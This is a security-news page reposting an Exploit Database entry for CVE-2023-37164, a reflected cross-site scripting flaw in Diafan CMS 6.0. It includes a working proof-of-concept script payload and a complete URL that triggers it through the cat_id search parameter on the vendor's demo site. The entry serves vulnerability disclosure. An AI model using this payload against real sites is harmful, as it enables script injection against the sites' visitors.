Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-37164: OffSec’s Exploit Database Archive

Diafan CMS v6.0 was discovered to contain a reflected cross-site scripting via the cat_id parameter at /shop/?module=shop&action=search.

CVE
Open in Source
#xss#auth
# Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr / Hulya Karabag
# Vendor Homepage: https://www.diafancms.com/
# Version: 6.0
# Tested on: https://demo.diafancms.com


Description:

1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field:
Payload : "><script>alert(document.domain)<%2Fscript>
2) After will you see alert button : 
https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE